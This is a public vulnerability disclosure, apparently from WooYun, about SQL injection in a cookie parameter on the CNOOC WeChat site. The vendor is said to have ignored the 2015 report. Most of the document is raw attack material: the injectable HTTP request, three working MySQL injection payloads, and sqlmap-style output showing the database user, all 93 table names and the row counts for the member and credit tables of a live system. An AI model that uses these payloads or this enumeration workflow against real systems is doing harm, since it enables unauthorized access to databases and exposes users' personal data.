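2015-06-30: Details reported to the vendor; awaiting vendor response
2015-07-05: Vendor chose to ignore the vulnerability; details disclosed to the public
SQL injection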
GET /mobile/lib/api.php HTTP/1.1
Cookie: BOKADOTCNSITEENGINE=*
X-Requested-With: XMLHttpRequest
Referer: http://weixin.cnooc.com.cn/
Host: weixin.cnooc.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: BOKADOTCNSITEENGINE=' RLIKE (SELECT (CASE WHEN (7907=7907) THEN 0x424f4b41444f54434e53495445454e47494e453d ELSE 0x28 END)) AND 'oflE'='oflE

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: BOKADOTCNSITEENGINE=' AND (SELECT 3414 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(3414=3414,1))),0x71766a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'MdHT'='MdHT

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: BOKADOTCNSITEENGINE=' OR SLEEP(5) AND 'gbCK'='gbCK
---
web application technology: PHP 5.4.35, Apache 2.4.12
back-end DBMS: MySQL 5.0
current user: 'qiyeplus@localhost'
available databases [2]:
[*] information_schema
[*] qiyeplus

Database: qiyeplus
[93 tables]
+----------------------+
| boka_account         |
| boka_address         |
| boka_agency          |
| boka_agencyproduct   |
| boka_award           |
| boka_card            |
| boka_channel         |
| boka_comments        |
| boka_count           |
| boka_credits         |
| boka_creditsettings  |
| boka_deliver         |
| boka_department      |
| boka_devices         |
| boka_dict            |
| boka_digs            |
| boka_failedlogins    |
| boka_fans            |
| boka_favorites       |
| boka_follow          |
| boka_form            |
| boka_formanswer      |
| boka_formitem        |
| boka_formresult      |
| boka_forum           |
| boka_friends         |
| boka_groups          |
| boka_hongbao         |
| boka_infodict        |
| boka_keywords        |
| boka_kfaccount       |
| boka_kfservices      |
| boka_knowledge       |
| boka_knowledgeclass  |
| boka_logins          |
| boka_logs            |
| boka_meeting         |
| boka_meetinginfo     |
| boka_members         |
| boka_message         |
| boka_modreason       |
| boka_mpgroups        |
| boka_mpmenu          |
| boka_mpmenu_20150615 |
| boka_mpmsg           |
| boka_navi            |
| boka_news            |
| boka_newsclass       |
| boka_newscontent     |
| boka_openid          |
| boka_operator        |
| boka_orderlist       |
| boka_orderrecord     |
| boka_orders          |
| boka_pages           |
| boka_permission      |
| boka_polls           |
| boka_posts           |
| boka_probation       |
| boka_product         |
| boka_productclass    |
| boka_pushit          |
| boka_qrcode          |
| boka_qymsg           |
| boka_rank            |
| boka_rebate          |
| boka_recommend       |
| boka_recommendclass  |
| boka_record          |
| boka_search          |
| boka_security        |
| boka_sense           |
| boka_senseclass      |
| boka_sessions        |
| boka_settings        |
| boka_shakearound     |
| boka_share           |
| boka_shareview       |
| boka_shops           |
| boka_sign            |
| boka_sorts           |
| boka_sponsor         |
| boka_supplierproduct |
| boka_tasks           |
| boka_timeline        |
| boka_tplmessage      |
| boka_tracks          |
| boka_userdict        |
| boka_usergroup       |
| boka_views           |
| boka_website         |
| boka_websiteclass    |
| boka_words           |
+----------------------+

+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| boka_credits         | 39768   |
| boka_members         | 36301   |
Fix
Severity: No impact (ignored by vendor)
Ignored at: 2015-07-05 14:36
Vulnerability Rank: 4 (WooYun rating)
None yet